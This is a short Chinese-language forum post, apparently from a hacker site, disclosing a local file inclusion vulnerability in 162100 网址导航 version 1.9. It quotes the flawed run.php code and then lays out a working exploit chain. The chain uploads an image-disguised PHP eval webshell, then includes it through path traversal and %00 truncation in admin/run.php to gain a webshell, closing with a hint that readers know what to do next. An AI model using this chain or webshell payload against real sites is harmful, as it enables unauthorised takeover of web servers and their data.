162100网址导航1.9本地文件包含漏洞
162100网址导航1.9本地文件包含漏洞发布日期:2010-10.27
发布作者:陆羽
影响版本:162100网址导航1.9
官方地址:[url]www.162100.com[/url]
漏洞类型:文件包含
漏洞描述:162100网址导航系统1.9存在本地文件包含漏洞,利用上传功能,上传图片木马可执行脚本获取网站webshell.
漏洞分析:admin 目录下 run.php 文件部分代码如下:
<?php if($_REQUEST['run'] && file_exists('./run/'.$_REQUEST['run'].'.php')) require_once('./run/'.$_REQUEST['run'].'.php'); //这里判断只要文件存在,就可以包含,未做任何限制,可目录跳转,所以,只要能上传文件,然后%00截断,即可上传 else alert('命令错误或功能尚未开通!','./index.html'); ?> 我找到上传目录
editor/index.html
使用上传图片功能,上传一个1.jpg 内容为 <?php eval($_POST[cmd])?>
获得地址editor/images/upload/2010102718265325.jpg
然后admin/run.php?run=../../editor/images/upload/2010102718265325.jpg%00
就是一个一句话了。。。剩下的你懂的。。。
我就传一个phpinfo示意下吧。。。
[img]http://www.hackersa.org/attachments/month_1010/1010301537de3b4d260d788e9c.jpg[/img]
页:
[1]